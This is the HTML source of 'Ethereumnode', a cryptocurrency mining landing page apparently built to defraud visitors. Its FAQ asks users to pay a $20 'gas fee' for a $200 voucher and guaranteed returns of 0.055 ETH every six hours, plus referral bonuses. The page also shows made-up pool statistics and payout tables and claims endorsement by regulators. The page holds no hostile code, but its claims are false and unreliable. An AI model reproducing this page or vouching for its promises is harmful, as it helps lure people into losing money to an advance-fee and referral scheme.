<html>
<head>
				<link rel="icon" href="https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img53.png">
   <title>Ethereumnode</title>
       
       <meta name="description" content="The Most World's leading secure and safe ethereum miner"/>
     
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    
   <style type="text/css">
   
   
   form {
   
   background-color: white;
   
   max-width: 80%;
   
   margin: 5px auto;
   
   padding: 5px 20px;
   
   box-shadow: 0px 1px 5px rgba(0, 0, 0, 0.12);
   }
   
   
   body {
   background-image: rl("images/index2.png");
   background-repeat: no-repeat;
   position: relative;

   }
   
   
   
   .u1 {
   font-size: 22px;
   color: blue;
   text-align: center;
   }
  
  * {
     box-sizing: border-box;
  }
  html, body {
     margin: 0;
     padding: 0;
  }
  form {
         box-shadow: 1px 5px 10px 1px hsla(240, 100%, 50%, 0.4), 0 1px 2px 1px hsla(240, 100%, 50%, 0.1);
         }
  .form-container {
     margin: 20px;
     padding: 15px;
     background: #173459;
     color: white;
     box-shadow: 0 5px 10px 0 rgba(0, 0, 0, 0.3), 0 7px 21px 0 rgba(0, 0, 0, 0.20);
  }
  .input-cnt {
     display: flex; /* display the icon and the input in a line */
     margin-bottom: 15px;
  }
  .input-cnt:last-child {
     margin-bottom: 0px;
  }
  .input-cnt > i {
     min-width: 40px; /* set a minimum width for the icon */
     padding: 10px; /* make sure the icon is centered vertically */
     text-align: center; /* horizontally center the icon */
     background: lightgrey;
     border-top-left-radius: 20px;
     border-bottom-left-radius: 20px;
     color: #0076ff;
  }
  /* change styles when focused */
  .input-cnt:hover > i {
     background: #0076ff;
     color: white;
  }
  /* style the inputs */
  .input-cnt > input[type="text"], .input-cnt > input[type="password"] {
     outline: none;
     border: none;
     padding: 7.20px;
     border: 1px solid lightgrey;
     border-top-right-radius: 20px;
     border-bottom-right-radius: 20px;
     width: 100%;
  }
  /* style the submit button */
  .input-cnt > input[type="submit"] {
     border: none;
     border-radius: 20px;
     outline: none;
     width: 75%;
     margin: 0 auto;
     font-size: 105%;
     padding: 8px;
     color: #0076ff;
     background: white;
     transition-duration: .5s;
  }
  /* add a hover effect for the submit button */
  .input-cnt > input[type="submit"]:hover {
     color: white;
     background: #0076ff;
  }
  
  #span {
  border: 50px insert white;
  border-radius: 7px;
background: hsla(240, 100%, 50%, 0.8);
      
  color: white;
  padding-left: 35px;
  padding-right: 35px;
  margin-right: 5px;
  margin-left: 1px;
  Font-size: 18px;
  
  }
 
  .man5 {
  
  background-color: white;
  
  max-width: 315px;
  
  margin: 2px auto;
  
  padding: 2px 20px;
  
  box-shadow: 2px 3px 6px 2px rgba(0, 0, 0, 0.2);
  
  }
  .man6 {
  color: #134580;
  font-size: 10px;
  }
  #uf {
  width: 15%;
  height: auto;
  height:  50px;
  }
  
  * {
  box-sizing: border-box;
  }
  i {
  display: inline-block;
  width: 30px;
  height: 30px;
  background-image: url(images/icons.png);
  margin-bottom: -5px;
  }
  i.home-icon {
  background-position: top 0 left 0;
  }
  i.envelope-icon {
  background-position: top 0 left -30px;
  }
  i.bell-icon {
  background-position: top 0 left -60px;
  }
  i.dashboard-icon {
  background-position: top 0 left -90px;
  }
  .dd {
  position: relative;
  display: inline-block;
  }
  .dd-btn {
  padding: 3.50px;

  text-align: left;
  background: hsla(250, 100%, 50%, 1);
  border: none;
  width: 360px;
  color: #f8f9f9;
  font-size: 20px;
  }
  .dd-content {
  position: absolute;
  width: 100%;
  box-shadow: 0 18px 36px rgba(0,0,0,0.30), 0 14px 11px rgba(0,0,0,0.22);
  height: 0px;
  transition: height 1s;
  overflow: hidden;
  }
  .dd:hover > .dd-content {
  height: 240px;
  }
  .dd-content > a {
  display: block;
  height: 60px;
  padding: 15px;
  text-decoration: none;
  color: black;
  }
  
  img {
  width: 90%;
  height: 10%;
  }
  .ffu {
  
  color: white;
  }
  
   .ffuu {
  
  background-color: hsla(240, 100%, 50%, 0.8);
  
  max-width: 100%;
  max-height: 1000px;
  margin: 5px auto;
  
  padding: 5px 20px;
  
  box-shadow: 0px 1px 5px rgba(0, 0, 0, 0.2);
  }
  
  
     #fuck6 {
     
     width: 8%;
     height: 0%;
     
         }
         
         #fucks {
         margin-left: 147px;
         }
         
         
         #fucks1 {
         margin-left: 147px;
         }
         
         

         .man7 {
         
         font-size: 11.50px;
         }
         
         
         
         #tt {
         width: 360.50px;
         height: auto;

         
         }
         
         .div1 {
            background-color: hsla(240, 100%, 50%, 0.7);
         
         background-image: url("https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img87.png");    
         backbground-repeat: no-repeat;
         position: relative;
         width: none;
         height: 320.50px;
           fiter: contrast(1);
                    fiter: brightness(0.8);
         }
         
         span {
         

         }
         
         
         .ffd {
         border: 50px insert white;
         border-radius: 1px;
         background: hsla(240, 100%, 50%, 0.7);
         
         color: white;
         padding-left: 35px;
         padding-right: 35px;
         margin-right: 5px;
         margin-left: 1px;
         Font-size: 18px;
         
         }
         
         .ffdd {
         border: 50px insert white;
         border-radius: 1px;
         background: hsla(0, 0%, 0%, 0.5);
         
         color: white;
         padding-left: 35px;
         padding-right: 35px;
         margin-right: 5px;
         margin-left: 1px;
         Font-size: 18px;

         }
         
         .uui {
         
          background: hsla(0, 0%, 0%, 0.8);
         
         max-width: 100%;
         max-height: 1000px;
         margin: 5px auto;
         
         padding: 5px 20px;
         
         box-shadow: 0px 1px 5px rgba(0, 0, 0, 0.2);
         }
         
         
        .uui2 {
         
         color: white;
         }
         
         #iii {
         
         margin-left: 200px
         }
         
         .m{
         paddin: 210px;
         }
         
         
         /* image bar option*/
         
         
         .ul {
         font-size: 22px;
         color: blue;
         text-align: center;
         }
         
         
         hml, body {
         margin: 0;
         padding: 0;


         }
         
         .n
         {
         background-image: url("images/index2.png");
         color: red;
         
         
         
         }
         
         .vv {
         position: absolute;
         top: 5px;
         left: 8px;
         }
         
         
         
         
         .vv1 {
         border: 50px insert white;
         border-radius: 7px;
         background: hsla(240, 100%, 50%, 0.8);
         
         color: white;
         padding-left: 35px;
         padding-right: 35px;
         margin-right: 5px;
         margin-left: 1px;
         Font-size: 18px;
         
         }
         
         
         
         
         
         
         
         .center2 {
         margin-left: 0px;
         }
         
         

         
         
         
         .container1 {
         position: relative;
         height: 36px;
         }
         
         
         .bb1 {
         margin-left: 55%;
         }
         
         
         .bb2 {
         margin-left: 64.50%;
         }
         
         
         
         /*image on down of text option*/
         form {
         
         background-color: white;
         
         max-width: 80%;
         max-height: 1000px;
         margin: 5px auto;
         
         padding: 5px 20px;
         
         box-shadow: 0px 1px 5px rgba(0, 0, 0, 0.2);
         }
         
         body {
         background-image: ul("images/index2.png");
         background-repeat: no-repeat;
         position: relative;
         align: center;
         }
         
         
         
         .ul {
         font-size: 22px;
         color: blue;
         text-align: center;
         }
         
         * {
         box-sizing: border-box;
         }
         html, body {
         margin: 0;
         padding: 0;
         }
         
         .man4 {
         box-shadow: 1px 5px 10px 1px hsla(240, 100%, 50%, 0.3), 0 1px 2px 1px hsla(240, 100%, 50%, 0.1);
         }
         
         .form-container {
         margin: 20px;
         padding: 15px;
         background: #173459;
         color: white;
         box-shadow: 0 5px 10px 0 rgba(0, 0, 0, 0.3), 0 7px 21px 0 rgba(0, 0, 0, 0.20);
         }
         .input-cnt {
         display: flex; /* display the icon and the input in a line */
         margin-bottom: 15px;
         }
         .input-cnt:last-child {
         margin-bottom: 0px;
         }
         .input-cnt > i {
         min-width: 40px; /* set a minimum width for the icon */
         padding: 10px; /* make sure the icon is centered vertically */
         text-align: center; /* horizontally center the icon */
         background: lightgrey;
         border-top-left-radius: 20px;
         border-bottom-left-radius: 20px;
         color: #0076ff;
         }
         /* change styles when focused */
         .input-cnt:hover > i {
         background: #0076ff;
         color: white;
         }
         /* style the inputs */
         .input-cnt > input[type="text"], .input-cnt > input[type="password"] {
         outline: none;
         border: none;
         padding: 7.20px;
         border: 1px solid lightgrey;
         border-top-right-radius: 20px;
         border-bottom-right-radius: 20px;
         width: 100%;
         }
         /* style the submit button */
         .input-cnt > input[type="submit"] {
         border: none;
         border-radius: 20px;
         outline: none;
         width: 75%;
         margin: 0 auto;
         font-size: 105%;
         padding: 8px;
         color: #0076ff;
         background: white;
         transition-duration: .5s;
         }
         /* add a hover effect for the submit button */
         .input-cnt > input[type="submit"]:hover {
         color: white;
         background: #0076ff;
         }
         
         
         
         #scan1 {
         border: 20px insert white;
         border-radius: 1px;
         background: hsla(240, 100%, 50%, 0.8);
         
         color: white;
         padding-left: 30px;
         padding-right: 30px;
         margin-right: 1px;
         margin-left: 10px;
         Font-size: 10px;
         
         }
         
         
         * {
         box-sizing: border-box;
         }
         i {
         display: inline-block;
         width: 30px;
         height: 30px;
         background-image: url(images/index4.jp);
         margin-bottom: -5px;
         }
         i.home-icon {
         background-position: top 0 left 0;
         }
         i.envelope-icon {
         background-position: top 0 left -30px;
         }
         i.bell-icon {
         background-position: top 0 left -60px;
         }
         i.dashboard-icon {
         background-position: top 0 left -90px;
         }
         .dd {
         position: relative;
         display: inline-block;
         }
         .dd-btn {
         padding: 1.50%;
         text-align: left;
         background: hsla(250, 100%, 50%, 0.9);;
         border: none;
         width: 370px;
         color: #f8f9f9;
         font-size: 20px;
         }
         .dd-content {
         position: absolute;
         width: 100%;
         box-shadow: 0 18px 36px rgba(0,0,0,0.30), 0 14px 11px rgba(0,0,0,0.22);
         height: 0px;
         transition: height 1s;
         overflow: hidden;
         }
         .dd:hover > .dd-content {
         height: 240px;
         }
         .dd-content > a {
         display: block;
         height: 60px;
         padding: 15px;
         text-decoration: none;
         color: black;
         }
         
         .man5 {
         
         background-color: white;
         
         max-width: 305px;
         
         margin: 5px auto;
         
         padding: 5px 20px;
         
         box-shadow: 2px 3px 6px 2px rgba(0, 0, 0, 0.2);
         
         }
         .man6{
         color: #134580;
         font-size: 16px;
         }
         #uf{
         width: 15%;
         height: auto;
         height:  50px;
         }
         img {
         width: 90%;
         height: 18%;
         }
         .ffu {
         
         color: white;
         }
         
         .ffuu {
         
         background-color: hsla(240, 100%, 50%, 0.8);
         
         max-width: 100%;
         max-height: 1000px;
         margin: 5px auto;
         
         padding: 5px 20px;
         
         box-shadow: 0px 1px 5px rgba(0, 0, 0, 0.2);
         }
         
         /* drop down style */
         
         
         * {
         box-sizing: border-box;
         }
         html, body {
         margin: 0;
         padding: 0;
         }
         .container {
         margin: 15px;
         }
         input[type="radio"] {
         display: none; /* hide the radio button because it does not look beautiful */
         }
         .container {
         border: 1px solid black;
         border-radius: 5px;
         }
         label {
         display: block;
         padding: 10px;
         border-bottom: 1px solid black;
         color: black;
         background: white;
         }
         .accordion:last-child > label, .accordion:last-child > .accordion-content {
         border: none;
         }
         .accordion-content {
         border-bottom: 1px solid black;
         padding: 15px;
         display: none;
         }
         /* select the accordion content when the label is clicked on or the input is checked */
         input:checked ~ .accordion-content {
         display: block;
         }
         
         .fuckyou {
         
         background-color: white;
         
         max-width: 90%;
         max-height: 40%;
         margin: 5px auto;
         
         padding: 5px 20px;
         
         box-shadow: 0px 1px 5px rgba(0, 0, 0, 0.2);
         }
         
         .n{
         background-image: url("images/index2.png");
         color: red;
         
         
         
         
         
         
         
         
         
         
         
         
         }
         .container2 {
         position: relative;
         height: 150px;
         }
         
         .vv {
         position: absolute;
         top: 11px;
         left: 8px;
         }
         
         .img11x{
         position: relative;
         width: 84.50%;
         height: auto;
         height: 111px;
         padding-left: 5%;
         margin-left: 5px;
         background-color: wite;
         
          top: 9px;
         filte: brightness(0);
         
         
         }
         
         
         .vv1 {
         border: 50px insert white;
         border-radius: 7px;
         background: hsla(240, 100%, 50%, 0.8);
         
         color: white;
         padding-left: 35px;
         padding-right: 35px;
         margin-right: 5px;
         margin-left: 1px;
         Font-size: 18px;
         
         }
         
         
         
         /*ABOUT OPTION*/
         .ul {
         font-size: 22px;
         color: blue;
         text-align: center;
         }
         
         
         /*hml, body {
         margin: 0;
         padding: 0;
         }*/
         
         .n
         {
         background-image: url("images/index2.png");
         color: red;
         
         
         
         }
         
         .vv {
         position: absolute;
         top: 5px;
         left: 8px;
         }
         
         
         
         
         .vv1 {
         border: 50px insert white;
         border-radius: 7px;
         background: hsla(240, 100%, 50%, 0.8);
         
         color: white;
         padding-left: 35px;
         padding-right: 35px;
         margin-right: 5px;
         margin-left: 1px;
         Font-size: 18px;
         
         }
         
         
         
         
         
         
         
         .center2 {
         margin-left: 0px;
         }
         
         

         
         
         .container11{
         position: relative;
         height: 200px;
         }
         
         
         .bb1 {
         margin-left: 55%;
         }
         
         
         .bb2 {
         margin-left: 64.50%;
         }
         
         
         
         
         .img111s {

         width: 12%;
         height: 6.50%;
         display: inline;
         
         }
         
         
         
         
         #img111 {
         width: 12%;
         height: 6.50%;
         display: inline;

         }
         
         

          /* drop down style */
          
          
          * {
          box-sizing: border-box;
          }
          html, body {
          margin: 0;
          padding: 0;
          }
          .container {
          margin: 15px;
          }
          input[type="radio"] {
          display: none; /* hide the radio button because it does not look beautiful */
          }
          .container {
          border: 1px solid black;
          border-radius: 5px;
          }
          label {
          display: block;
          padding: 10px;
          border-bottom: 1px solid black;
          color: black;
          background: white;
          }
          .accordion:last-child > label, .accordion:last-child > .accordion-content {
          border: none;
          }
          .accordion-content {
          border-bottom: 1px solid black;
          padding: 15px;
          display: none;
          }
          /* select the accordion content when the label is clicked on or the input is checked */
          input:checked ~ .accordion-content {
          display: block;
          }
          
          .fuckyou {
          
          background-color: white;
          
          max-width: 90%;
          max-height: 40%;
          margin: 5px auto;
          
          padding: 5px 20px;
          
          box-shadow: 0px 1px 5px rgba(0, 0, 0, 0.2);
          }

         
         
         
         
         
         
         
         .span3 {
         margin-left: 0%;
         }
         
         
         .vv11 {
         position: absolute;
         top: 2px;
         left: px;
         }
         
         
         #fuck3 {
         position: absolute;
         width:32px;
         height: 25px;

         }
         
         
         .container111 {
         position: relative;
         height: 27px;
         }
         
         
         #fuck4 {
         position: relative;
         width: 100%;
         height: 15.50px;
         top: 5px;

         }

         .container11 {
         position: relative;
         height: 175px;
         }
         
         
         
         
         
         
         
         
         
         
         .button1:hover {

         background-color: hsla(0, 0%, 0%, 0.5);
         color:   white;
         border: none;
         box-shadow: 1px 1px 1px 1px   hsla(240, 100%, 25%, 0.9);
         cursor: pointer;
         -webkit-transition-duration: 0s; /* for Safari */
         transition-duration: 0s;
         }
         
         .button1 {
                  outline: none;
         border: none;
          height: 50px;
         width: 40%;
         border-radius: 30px;  
         bordner: 12px;
         font-size: 14px;
         background: white;
         color:  white;
         background: hsla(240, 100%, 50%, 0.7);
         }
         
         
         
         
         
         .button2:hover {
         background-color: hsla(240, 100%, 50%, 0.7);
         color:   white;
         border: none;
         box-shadow: 1px 1px 1px 1px   hsla(240, 100%, 25%, 0.9);
         cursor: pointer;
         -webkit-transition-duration: 0s; /* for Safari */
         transition-duration: 0s;
         }
         
         .button2 {
                  outline: none;
         border: none;
             height: 50px;
         width: 40%;
         border-radius: 30px;  
         bordner: 12px;
         font-size: 14px;
         background: hsla(0, 0%, 0%, 0.5);
         color:  white;
         
         }
         
         
         
         
         
         #t11 {
         position: relative;
         top: 18px;
         width: 27.50%;
         height: 27.50%;

         }
         
         
         
         .uiu {
         
         position: relative;
         top: 3px;
         }
         
         
         .uii {
         
         position: relative;
         top: 5px;
         
         }
         
         
         .diver{
         border-radius: 5.50px;
         border-style: none;
         height: 205px;
         margin-left: 20px;
         margin-right: 20px;
         background: white;
         
         }
         
         
         #uuu2 {
         margin-left: 118px;
         }
         
         #uuu1 {
         margin-left: 85px;
         }
         
         #uuu3 {
         margin-left: 150px;
         }
         
         .man5 {
         
         background-color: white;
         
         max-width: 305px;
         
         margin: 5px auto;
         
         padding: 5px 20px;
         
         box-shadow: 2px 3px 6px 2px rgba(0, 0, 0, 0.2);
         
         }
         
         
         
         
         
         #fucks1 {
         margin-left: 128px;
         }
         
         
         #fucks {
         margin-left: 135px;
         }
         
         
         
         .man5 {

         
         
         



         
         
    </style>
    </head>
   <body style="font-size: 14px; font-family: 'Montserrat Alternates', sans-serif;">


 <!--<div class="container111" style="background-color: hsla(240, 100%, 50%, 0.7); color: white">
  <div class="vv11">
   <b style="font-size: 13px">     <section>
           <small> <b>
           
           <b style="color: black; font-size: 9.50px">&nbsp;&nbsp;Welcome to ETHEREUM</b><b style="font-size: 5.50px">NODE</b> 
           <b style="font-size: 15px; color: black">|&nbsp;<b style="color: black;font-size: 9.50px">Easly mine and withdraw everyday<b style="font-size: 15px; color: black">&nbsp;|&nbsp;</b><u><a href="#more"style="text-decoration: none; color: black; font-size: 9.50">More>></u></a></b></b></b></small>


      </section> <!--    <b style="color: black; font-size: 13px">&nbsp;&nbsp;Welcome to ETHEREUM</b><b style="font-size: 8px">NODE</b> 
           <b style="font-size: 20px; color: black">|&nbsp;<b style="color: black;font-size: 13px"><u><a href="#more"style="text-decoration: none; color: black">More..</u></a>
          <!--  <a href="indexETH(bar alert).html"style="text-decoration: none;"> 
                    &nbsp; <img id="fuck3" src="../images/index19.jpg" /></a> -->
           <!--&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -->

        <!--<img id="fuck4" src="../ethereumnode-website-datacodes/img/img59.jpg" /></a>-->
         <!--  <b style="color: hsla(0, 0%, 0%, 0.8); font-size: 22px">ETHEREUM </b><b style="font-size: 10.50px">NODE</b></b>
         -->
          <!-- <small> <b> <a href="indexETH(bar alert).html"style="text-decoration: none;"><img id="fuck3" src="../images/index19.jpg" /></a>
              <b style="color: hsla(0, 0%, 0%, 0.8); font-size: 15px">&nbsp;ETHEREUM</b><b style="font-size: 2.50px;">NODE</b></b>
              </b></dd></small>-->
           </section>
    </span></span></section></div></div></b>
     
     
     
     

         
         
         
         
     
     
     
    

     <center> <div class="div1">

   <span style="color: white">
  <span>&nbsp;</span>

      <center><img id="t11"src="https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img53.png"></center>


        <p><span>&nbsp;</span></p>

    <center><span><b></b></span><h3 style="color:  hsla(240, 100%, 25%, 0.9)">ETHEREUM<span style="color: white; fhont-size: 13.50px">NODE</span></h2>
  <b><p style="font-size: 11px; color: white"><!--Joining Our ETHEREUM NODE Is The Most Secure And Easy Way To Ean Up To %60 on Ethereum Currency, All You Need To Do And start Mining Ethereum From Our Node Is To Join Our Node mining Which Will Be Mining Ethereum daily For You. Withdrawal Is Instanstly-->
  <!--Joining Our Ethereumnode To Mine Ethereum Is The Most Secure And Easy Way To Mine Up To 80% Of Ethereum Crypto Currency.-->
  <b> <p style="font-size: 12px; color: white; text-align: center;">Secure And Easly Mine Up To 80% Of Ethereum Crypto Currency.
   </b> </p></center>
  </b>
  


  <p> &nbsp;</p>
   <center><a href="login.html"style="text-decoration: none;">
   
   
      <button class="button1">Log In</button></a>
   
   
   
   
  <!-- <span class ="ffd"style="color: white; font-size: 17px"><b>Login</b></b></b></b></b></span></a>
   
   -->
   

   
   
    &nbsp;&nbsp;&nbsp;<a href="register.html"style="text-decoration: none;">      <button class="button2">Register</button></a>
    
    
    
    
    
    
  <!--  <span class ="ffdd"style="color: white; font-size: 17px"><b>Register</a></b></center>
                
     -->

                
                
                
                
                
                
                </div>

    </span></span></span></span></span></span></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></center></center>



 <p>&nbsp;</p>
     <div class="container2" style="background-color: white; color: black">
   <!--  <img class="img11x"src="../ethereumnode-website-datacodes/img/img51.png" />-->
     <span class="vv"><b>
     
     
     <center>   <small> <h4>JOIN OUR MINING TO BENEFIT FROM OUR NODE</h4></dd></small>
     </b>   
         
       <p><small><pm style="font-size: 11px">Ethereumnode is a standard ETH cryptocurrency mining company, that offers a high degree of profitable partnership to ETH cryptocurrency miner's, through which they can legally earned ethereum by joining ethereumnode. miner's acquire the legal right and secured way to earn ethereum through our node mining.
     </small></p></span></spnn></span></div></p></a>
     


   
   

   <small>  <center><b><h3>Mining</h2></b></center></small>
   
   
   <small><section> <center><p>Miner's node</p></p></p></center></section></section></small>
    <form class="man5"id="f4"><b><h3>Pool data</h3></b>
        <small><section class="man7">Total&nbsp;Output <b id="uuu2"style="font-size: 12x"><b style="color: #134580">964481 ETH</b></section></b>
        <section  class="man7"><p>Valid&nbsp;Node <b id="uuu3" style="font-size: 12x"><b style="color: #134580">151186</b></section></b>
     <section class="man7"><p>Participates <b id="uuu3" style="font-size: 12x"><b style="color: #134580">69728</b></section></b>
     <section  class="man7"><p>Users&nbsp;Revenue <b id="uuu1"style="font-size: 12x"><b style="color: #134580">292586735 USD</b></section> </b></form> 
            
     </p></p></p></p></p></small></small></small>
    
                       
                      <p>&nbsp;</p>                     
      
      
   
  <p> <small> <center> <section style="font-size: 13px">Miner's liquidity mining income</section></center></small>
  </p>

   <form class="man5"id="f44"> <h3><b style="font-size: 18px">Users Output</b></h3>
   
   <p style="font-size: 12px;"><b><section>Address<span id="fucks">Quantity</span></b></p></p></p></p>
  <section class="man6"style="font-size: 12px"><small>oxhes*****&nbsp; <span id="fucks1">0.698367&nbsp;ETH</span></section></small>
   <section class="man6"style="font-size: 12px;"><small>ox20f*****&nbsp;&nbsp; <span Id="fucks1">0.556454&nbsp;ETH</span></section></small>
   <section class="man6"style="font-size: 12px;"><small>oxiYT*****&nbsp;&nbsp;&nbsp;<span Id="fucks1">0.269169&nbsp;ETH</span></section></small>
   <section class="man6"style="font-size: 12px;"><small>oxWsC*****&nbsp;<span Id="fucks1">0.488667&nbsp;ETH</span></section></small>
   <section class="man6"style="font-size: 12px;"><small>oxdmE*****<span Id="fucks1"> 0.878346&nbsp;ETH</span></section></small>
   <section class="man6"style="font-size: 12px;"><small>oxj3s*****&nbsp;&nbsp;&nbsp;&nbsp;<span Id="fucks1">0.367930&nbsp;ETH</span></section></small>
   <section class="man6"style="font-size: 12px;"><small>oxjda*****&nbsp;&nbsp;&nbsp;&nbsp;<span Id="fucks1">0.146835&nbsp;ETH</span></section></small>
   <section class="man6"style="font-size: 12px;"><small>oxnFM*****<span Id="fucks1">  0.766454&nbsp;ETH</span></section></small>
   <section class="man6"style="font-size: 12px;"><small>oxDgs*****&nbsp;<span Id="fucks1">  0.498446&nbsp;ETH</span></section></small>
   <section class="man6"style="font-size: 12px;"><small>ox2sH*****&nbsp;<span Id="fucks1"> 0.868348&nbsp;ETH</span></section> </small>    
   <section class="man6"style="font-size: 12px;"><small>oxBNH*****&nbsp;<span Id="fucks1">0.587367&nbsp;ETH</span></section>  </small>    
   <section class="man6"style="font-size: 12px;"><small>oxhRl*****&nbsp;&nbsp;&nbsp;&nbsp;<span Id="fucks1">0.243765&nbsp;ETH </span></section> </small> 
   <section class="man6"style="font-size: 12px;"><small>oxYRk*****&nbsp;&nbsp;&nbsp;<span Id="fucks1">0.368677&nbsp;ETH</span></section></small>
  </p></p></p></section></section></form>
   <center> <p>
   <p>&nbsp;</p>
   <b style="font-size: 11.20px"> WHY MINING ON OUR NODE</b></p></center>
   
   <center> <img id="uf"img src="https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img71.jpg" /></center></a>
   <p><center style="font-size: 13px">We're secure</center></p>
   <center><small style="font-size: 11px">Earning through our ETH currency mining, is the  easy and secure way to earn Ethereum.</small></small>
   
   <center> <img id="uf"img src="https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img722.png" /></center></a>
   <p>  <center style="font-size: 13px">We accept only ETH mining</center></p>
   <center><small style="font-size: 11px">Crypto Currency is at edge to end the monetary system, as we all know ETH is the second modern world crypto currency as we know today.</small></small>
   </center></center>
   <p>&nbsp;</p> 
   <center><b><h3><b style="font-size: 13px">Partners</b></h3></b></center>
   <center><section style="font-size: 11.50px">Our busness partners</section></center>
  <p> <center>
<img id="img111" src="https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img71.png"style="border-radius: 7px;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
   <img id="img111" src="https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img72.png">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
     <img id="img111" src="https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img75.png">
</center></center>
 </p>
   
   
    <p>&nbsp;</p>
   
   <p><center><b>Help Center</b></center></p>

   <!-- drop down style-->
   
   
   
   <form class="fuckyou">
   <div class="accordion">
   <input type="radio" name="accordion" id="accordion6">
   
   <label for="accordion6"><b><small style="font-size: 10.50px">  How it works <span class="span3"></span></small></b></label>
   <div class="accordion-content">
   <small style="font-size: 10px"> To start mining ETH on our site, you will first register account or log in with your Username and Password and pay for miner's gas fee $20 ETH, and receive voucher reward $200 and automatically start mining a lifetime ETH from our Node.</small>
   </div>
   
   </div>
   </form>
   <form class="fuckyou">
   <div class="accordion">
   <input type="radio" name="accordion" id="accordion2">
   <label for="accordion2"><b><small style="font-size: 10.50px">  How much calculation income will I be mining? <span class="span3"></span></small></b></label>
   <div class="accordion-content">
   <small style="font-size: 10px">When you join node successfully, our system will automatically start to calculate you a total of 0.055 ETH you will be mining every 6 hours. You can also increase your mining through inviting friends to the node with your invitation link.</small>
   </div>
   </div>
   </form>
   <form class="fuckyou">
   <div class="accordion">
   <input type="radio" name="accordion" id="accordion4">
   <label for="accordion4"><b><small style="font-size: 10.50px">  Can i earn more ETH from inviting friends? <span class="span3"></span></small></b></label>
   <div class="accordion-content">
   <small style="font-size: 10px">Yes! When you join node successfully, you will get personal invitation link. Each friend you invited with your invitation link, you will get 0.155 ETH.</small>
   </div>
   </div></form>
   
   
   
   
   
   
   
   <p>&nbsp;</p>
<!--
   <body style="font-size: 15px; font-family: 'Montserrat Alternates', sans-serif;">
   <div class="container11" style="background-color: hsla(240, 100%, 50%, 0.7); color: white">
   <div class="vv">
   <b style="font-size: 13px">



   
   <p id="more">ABOUT</p></b>
   <p style="font-size: 9.50px">This company is standard ETH cryptocurrency mining company where miner's can earn Ethereum through the legal and assured means of profiting the Blockchain Technology. Over the years, we have been chosen by many all around the globe and have been recommended by many regulatory bodies for our quality mining pool and we are on the Mission to provide the right full and legal means of earning cryptocurrency through mining. Get rewarded, join the mining network, join Ethereumnode today.
   </p>
       <p style="font-size: 11px;"><b style="color: hsla(0, 0%, 0%, 0.8)"> ETHEREUM</b><b style="font-size: 6.50px">NODE</b> <b class="bb1"><span class="span11"style="color: hsla(0, 0%, 0%, 0.8)"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;CONTACTS </b>  </p> </a></b>
      <section style="font-size: 11px;"><span style="color: hsla(0, 0%, 0%, 0.8)">     <a href="#"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">  Home</a></span><span class="bb2">     <a href="indexcustomerservice.html"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)">Customer service</span></a>
             <section style="font-size: 11px;">     <a href="##"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)"> FAQ</span></a><span class="bb2">     <a href="   https://t.me/Ethereumnode_Customer_Service"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;telegram link </span>
    </a></span>

 -->
 
 
      <body style="font-size: 11px; font-family: 'Montserrat Alternates', sans-serif;">
      <div class="container11" style="background-color: hsla(240, 100%, 50%, 0.7); color: white">
      <div class="vv">
      <b style="font-size: 11px">     
      <center>
      <p id="more"><u style="color: red"><span style="font-size: 9px;">ABOUT <b><span style=" color:  hsla(240, 100%, 25%, 0.9);">ETHEREUM</span><span style="color: white; font-size: 9">NODE</span></b></p></b></u>
      <p style="font-size: 8.80px">This company is standard ETH cryptocurrency mining company where miner's can earn Ethereum through the legal and assured means of profiting the Blockchain Technology. Over the years, we have been chosen by many all around the globe and have been recommended by many regulatory bodies for our quality mining pool, and we are on the Mission to provide the right full and legal means of earning cryptocurrency through mining. Get rewarded, join the mining network, join Ethereumnode today.
      </p></center>
      
      <center class="uiu">

     <center class="uii"><span style="font-size: 9px; color: black"><a href="#"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">HOME</a>&nbsp;</span><span style="color: white; font-size: 14px;">&nbsp;</span><span style="font-size: 9px; color: black"><a href="##"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">FAQ</a>&nbsp;</span><span style="color: white; font-size: 14px;">&nbsp;<span style="font-size: 9px; color: black"><a href="https://t.me/Ethereumnode_Customer_Service"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">CUSTOMER SERVICE</a>&nbsp;</span><span style="color: white; font-size: 14px;">&nbsp;<span style="font-size: 9px; color: black"><a href="https://t.me/Ethereumnode_Customer_Service"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">TELEGRAM LINK</a>&nbsp;</span><span style="color: white; font-size: 14px;">&nbsp;<span style="font-size: 9px; color: black"><a href="##"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">NEWS</span>



      
      
      
      
